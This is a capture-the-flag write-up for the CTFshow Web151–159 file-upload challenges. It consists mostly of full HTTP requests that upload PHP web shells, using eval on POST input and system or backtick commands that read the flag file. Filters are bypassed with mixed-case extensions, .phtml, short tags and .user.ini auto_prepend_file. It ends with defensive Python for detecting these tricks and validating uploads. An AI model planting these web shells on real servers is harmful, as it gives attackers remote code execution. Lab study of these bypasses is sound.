[CTFshow File Upload Web151-159] 2021.9.9 CTFshow practice

This post was last updated on: 9 September 2021, 7:40 PM

Web151

A new starting point. Keep it up!

Open the challenge:

[screenshot]

The challenge states outright that the validation is done on the front end.

[screenshot]

Upload an image as-is to get past the front-end JavaScript check, then intercept the request in Burp Suite and modify it.

The HTTP request is as follows:

POST /upload.php HTTP/1.1
Host: 39985766-e05d-4db6-961e-43f027ee953d.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------313476209035142804473903416994
Content-Length: 245
Origin: http://39985766-e05d-4db6-961e-43f027ee953d.challenge.ctf.show:8080
Connection: close
Referer: http://39985766-e05d-4db6-961e-43f027ee953d.challenge.ctf.show:8080/

-----------------------------313476209035142804473903416994
Content-Disposition: form-data; name="file"; filename="shell1.php"
Content-Type: image/png

<?php
@eval($_POST[1]);
-----------------------------313476209035142804473903416994--

Then connect to upload/shell1.php with AntSword; the password is 1.

Official hint:

Front-end validation; capture the request and modify the data, OK.

Web152

Back-end validation cannot be a single check

Open the challenge:

[screenshot]

Same as the previous challenge: upload the same file. The PoC is as follows:

POST /upload.php HTTP/1.1
Host: 86504515-df89-4e9a-933e-781ad21cee2a.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------146607698723639856751513564408
Content-Length: 245
Origin: http://86504515-df89-4e9a-933e-781ad21cee2a.challenge.ctf.show:8080
Connection: close
Referer: http://86504515-df89-4e9a-933e-781ad21cee2a.challenge.ctf.show:8080/

-----------------------------146607698723639856751513564408
Content-Disposition: form-data; name="file"; filename="shell1.php"
Content-Type: image/png

<?php
@eval($_POST[1]);
-----------------------------146607698723639856751513564408--

Connect with AntSword; the password is 1.

Official hint:

Web153

Open the challenge:

[screenshot]

This challenge makes use of the .user.ini configuration file.

First, upload the shell as shell.phP:

POST /upload.php HTTP/1.1
Host: 9580fbab-bce5-4c82-92be-f33a73a3a79c.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------313230171228898302571574235903
Content-Length: 244
Origin: http://9580fbab-bce5-4c82-92be-f33a73a3a79c.challenge.ctf.show:8080
Connection: close
Referer: http://9580fbab-bce5-4c82-92be-f33a73a3a79c.challenge.ctf.show:8080/

-----------------------------313230171228898302571574235903
Content-Disposition: form-data; name="file"; filename="shell.phP"
Content-Type: image/png

<?php
@eval($_POST[1]);
-----------------------------313230171228898302571574235903--

Then upload .user.ini:

POST /upload.php HTTP/1.1
Host: 9580fbab-bce5-4c82-92be-f33a73a3a79c.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------313230171228898302571574235903
Content-Length: 249
Origin: http://9580fbab-bce5-4c82-92be-f33a73a3a79c.challenge.ctf.show:8080
Connection: close
Referer: http://9580fbab-bce5-4c82-92be-f33a73a3a79c.challenge.ctf.show:8080/

-----------------------------313230171228898302571574235903
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.phP
-----------------------------313230171228898302571574235903--

Here auto_prepend_file causes upload/index.php in that directory to include shell.phP,

which is equivalent to upload/index.php gaining an extra require('shell.phP').

Then just visit upload/index.php; the password is 1.

Official hint:
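To see the .user.ini trick above from the defender's side, here is an added example (not part of the original writeup) that walks an upload directory, finds every .user.ini carrying auto_prepend_file or auto_append_file, and resolves the file it points to; the directory layout and files are constructed inside demo() to mirror Web153.

```python
import os
import re
import tempfile
from pathlib import Path

# auto_prepend_file / auto_append_file in a per-directory .user.ini make PHP
# include another file before/after every script in that directory (the Web153 mechanism).
INCLUDE_DIRECTIVE = re.compile(
    r"""^\s*(auto_prepend_file|auto_append_file)\s*=\s*["']?([^"';\s]+)""",
    re.IGNORECASE,
)


def find_user_ini_includes(root):
    """Walk root; return (ini path, directive, target, target exists) for each hit."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if ".user.ini" not in files:
            continue
        ini_path = Path(dirpath) / ".user.ini"
        for line in ini_path.read_text(errors="replace").splitlines():
            m = INCLUDE_DIRECTIVE.match(line)
            if not m:
                continue
            # A relative target resolves against the directory holding the .user.ini.
            target = m.group(2)
            findings.append((
                ini_path.relative_to(root).as_posix(),
                m.group(1).lower(),
                target,
                (Path(dirpath) / target).exists(),
            ))
    return findings


def demo():
    """Constructed sample: a temporary upload directory laid out like Web153's."""
    with tempfile.TemporaryDirectory() as tmp:
        upload = Path(tmp) / "upload"
        upload.mkdir()
        (upload / "index.php").write_text("<?php echo 'upload dir';\n")
        (upload / "shell.phP").write_text("placeholder, not a real web shell\n")
        (upload / ".user.ini").write_text("auto_prepend_file = shell.phP\n")
        return find_user_ini_includes(tmp)
```

Run this against a real web root periodically or from a file-integrity hook: a .user.ini under a directory that only ever receives user uploads has no legitimate reason to exist.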

Web154

Back-end validation cannot be a single check (II)

Open the challenge:

[screenshot]

Compared with the previous challenge, this one additionally inspects the file content and filters the string php, so bypass it with mixed case. First upload the shell:

POST /upload.php HTTP/1.1
Host: 0f646679-1524-4d9d-86ad-a46f1f9eb338.challenge.ctf.show:8080
Content-Length: 206
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuwwZEU5QFnYrPlD1
Origin: http://0f646679-1524-4d9d-86ad-a46f1f9eb338.challenge.ctf.show:8080
Referer: http://0f646679-1524-4d9d-86ad-a46f1f9eb338.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryuwwZEU5QFnYrPlD1
Content-Disposition: form-data; name="file"; filename="shell.Php"
Content-Type: image/png

<?Php
@eval($_POST[1]);
------WebKitFormBoundaryuwwZEU5QFnYrPlD1--

Then upload .user.ini:

POST /upload.php HTTP/1.1
Host: 0f646679-1524-4d9d-86ad-a46f1f9eb338.challenge.ctf.show:8080
Content-Length: 211
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryuwwZEU5QFnYrPlD1
Origin: http://0f646679-1524-4d9d-86ad-a46f1f9eb338.challenge.ctf.show:8080
Referer: http://0f646679-1524-4d9d-86ad-a46f1f9eb338.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryuwwZEU5QFnYrPlD1
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.Php
------WebKitFormBoundaryuwwZEU5QFnYrPlD1--

Then visit upload/index.php; the password is 1.

Official hint:

Web155

Back-end validation cannot be a single check (III)

Open the challenge:

[screenshot]

The filename filter now blocks PHP, so use phtml instead, and in the file content use the short tag in place of the normal opening tag.

POST /upload.php HTTP/1.1
Host: a6292ae3-77f2-47b6-9cf2-2d103cd73996.challenge.ctf.show:8080
Content-Length: 206
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryW4AXLYTUJ6mAfb8i
Origin: http://a6292ae3-77f2-47b6-9cf2-2d103cd73996.challenge.ctf.show:8080
Referer: http://a6292ae3-77f2-47b6-9cf2-2d103cd73996.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryW4AXLYTUJ6mAfb8i
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

<?=
@eval($_POST[1]);
------WebKitFormBoundaryW4AXLYTUJ6mAfb8i--

The HTTP request for .user.ini is as follows:

POST /upload.php HTTP/1.1
Host: a6292ae3-77f2-47b6-9cf2-2d103cd73996.challenge.ctf.show:8080
Content-Length: 213
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryW4AXLYTUJ6mAfb8i
Origin: http://a6292ae3-77f2-47b6-9cf2-2d103cd73996.challenge.ctf.show:8080
Referer: http://a6292ae3-77f2-47b6-9cf2-2d103cd73996.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryW4AXLYTUJ6mAfb8i
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.phtml
------WebKitFormBoundaryW4AXLYTUJ6mAfb8i--

Then visit upload/index.php; the password is 1.

Web156

Open the challenge:

[screenshot]

Testing shows that this challenge filters square brackets, so use {} in place of []. The HTTP request is as follows:

POST /upload.php HTTP/1.1
Host: 8382ad5b-faff-4162-9380-abd8f208ff27.challenge.ctf.show:8080
Content-Length: 210
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt1eEp1v9TTsD9NT3
Origin: http://8382ad5b-faff-4162-9380-abd8f208ff27.challenge.ctf.show:8080
Referer: http://8382ad5b-faff-4162-9380-abd8f208ff27.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryt1eEp1v9TTsD9NT3
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

<?=
@eval($_POST{1});
?>
------WebKitFormBoundaryt1eEp1v9TTsD9NT3--

The .user.ini request is as follows:

POST /upload.php HTTP/1.1
Host: 8382ad5b-faff-4162-9380-abd8f208ff27.challenge.ctf.show:8080
Content-Length: 213
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt1eEp1v9TTsD9NT3
Origin: http://8382ad5b-faff-4162-9380-abd8f208ff27.challenge.ctf.show:8080
Referer: http://8382ad5b-faff-4162-9380-abd8f208ff27.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryt1eEp1v9TTsD9NT3
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.phtml
------WebKitFormBoundaryt1eEp1v9TTsD9NT3--

As before, visit upload/index.php; the password is 1.

Web157

Back-end validation cannot be a single check (V)

Open the challenge:

[screenshot]

This one filters the three symbols {}, [] and ;, but system commands can still be executed directly. The HTTP request is as follows:

POST /upload.php HTTP/1.1
Host: 00aa62cc-906c-48cf-9f71-c4f324ecbf0b.challenge.ctf.show:8080
Content-Length: 217
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQmFVF8aXG4GrSGta
Origin: http://00aa62cc-906c-48cf-9f71-c4f324ecbf0b.challenge.ctf.show:8080
Referer: http://00aa62cc-906c-48cf-9f71-c4f324ecbf0b.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryQmFVF8aXG4GrSGta
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

<?=
system("nl ../flag.???")
?>
------WebKitFormBoundaryQmFVF8aXG4GrSGta--

The .user.ini configuration is as follows:

POST /upload.php HTTP/1.1
Host: 00aa62cc-906c-48cf-9f71-c4f324ecbf0b.challenge.ctf.show:8080
Content-Length: 213
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQmFVF8aXG4GrSGta
Origin: http://00aa62cc-906c-48cf-9f71-c4f324ecbf0b.challenge.ctf.show:8080
Referer: http://00aa62cc-906c-48cf-9f71-c4f324ecbf0b.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundaryQmFVF8aXG4GrSGta
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.phtml
------WebKitFormBoundaryQmFVF8aXG4GrSGta--

Official hint:

Web158

Back-end validation cannot be a single check (VI)

Open the challenge:

[screenshot]

Same as Web157: direct command execution.

POST /upload.php HTTP/1.1
Host: 0bcddaab-7b8a-410b-be97-53525bfb1f90.challenge.ctf.show:8080
Content-Length: 217
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydHfy5QBrwHMmROBc
Origin: http://0bcddaab-7b8a-410b-be97-53525bfb1f90.challenge.ctf.show:8080
Referer: http://0bcddaab-7b8a-410b-be97-53525bfb1f90.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundarydHfy5QBrwHMmROBc
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

<?=
system("nl ../flag.???")
?>
------WebKitFormBoundarydHfy5QBrwHMmROBc--

The .user.ini configuration is as follows:

POST /upload.php HTTP/1.1
Host: 0bcddaab-7b8a-410b-be97-53525bfb1f90.challenge.ctf.show:8080
Content-Length: 213
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydHfy5QBrwHMmROBc
Origin: http://0bcddaab-7b8a-410b-be97-53525bfb1f90.challenge.ctf.show:8080
Referer: http://0bcddaab-7b8a-410b-be97-53525bfb1f90.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundarydHfy5QBrwHMmROBc
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.phtml
------WebKitFormBoundarydHfy5QBrwHMmROBc--

Official hint:

Web159

Masters, you can do it.

Open the challenge:

[screenshot]

This one filters (){}; and more, so fall back to inline execution with the backtick operator.

POST /upload.php HTTP/1.1
Host: dbddf662-2d00-43d9-97dc-2e40251a62cd.challenge.ctf.show:8080
Content-Length: 209
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary54ZnwkAMEvIGTJVv
Origin: http://dbddf662-2d00-43d9-97dc-2e40251a62cd.challenge.ctf.show:8080
Referer: http://dbddf662-2d00-43d9-97dc-2e40251a62cd.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary54ZnwkAMEvIGTJVv
Content-Disposition: form-data; name="file"; filename="shell.phtml"
Content-Type: image/png

<?=
`nl ../????.???`
?>
------WebKitFormBoundary54ZnwkAMEvIGTJVv--

Likewise, upload .user.ini:

POST /upload.php HTTP/1.1
Host: dbddf662-2d00-43d9-97dc-2e40251a62cd.challenge.ctf.show:8080
Content-Length: 213
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary54ZnwkAMEvIGTJVv
Origin: http://dbddf662-2d00-43d9-97dc-2e40251a62cd.challenge.ctf.show:8080
Referer: http://dbddf662-2d00-43d9-97dc-2e40251a62cd.challenge.ctf.show:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

------WebKitFormBoundary54ZnwkAMEvIGTJVv
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

auto_prepend_file = shell.phtml
------WebKitFormBoundary54ZnwkAMEvIGTJVv--

Official hint:
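Every bypass from Web152 through Web159 gets past a blocklist (lower-case php in the name or content, the [ and ] characters, and so on). As an added example that is not part of the original writeup, the Python below takes the opposite, allowlist approach: it lower-cases the extension before comparing (so shell.phP and shell.Php fail exactly like shell.php), rejects dotfiles such as .user.ini, checks that the bytes really start with the declared image type's magic, flags any PHP open tag including the short tag <?=, and lets the server pick the stored name; the allowed types and their magic values are assumptions for this example.

```python
import os
import re
import secrets

# Allowlist (assumed for this example): extension -> magic bytes the file must start with.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Every PHP open tag ("<?php", the short tag "<?" and the echo tag "<?=") starts with "<?".
PHP_OPEN_TAG = re.compile(rb"<\?")


def validate_upload(filename, content):
    """Return the reasons to reject this upload; an empty list means accept."""
    reasons = []
    # Strip any client-supplied path; a leading dot covers .user.ini and .htaccess.
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name.startswith("."):
        reasons.append("dotfile or empty name")
    ext = os.path.splitext(name)[1].lstrip(".").lower()  # shell.phP -> "php"
    if ext not in ALLOWED:
        reasons.append(f"extension not allowed: {ext or '(none)'}")
    elif not content.startswith(ALLOWED[ext]):
        reasons.append(f"content does not look like {ext}")
    if PHP_OPEN_TAG.search(content):
        reasons.append("PHP open tag in content")
    return reasons


def storage_name(filename):
    """Server-chosen name: random stem plus the (lower-cased) validated extension."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    return f"{secrets.token_hex(8)}.{ext}"
```

Call storage_name only after validate_upload has returned an empty list, and keep the upload directory out of PHP's handler entirely so a stray file is served as data rather than executed.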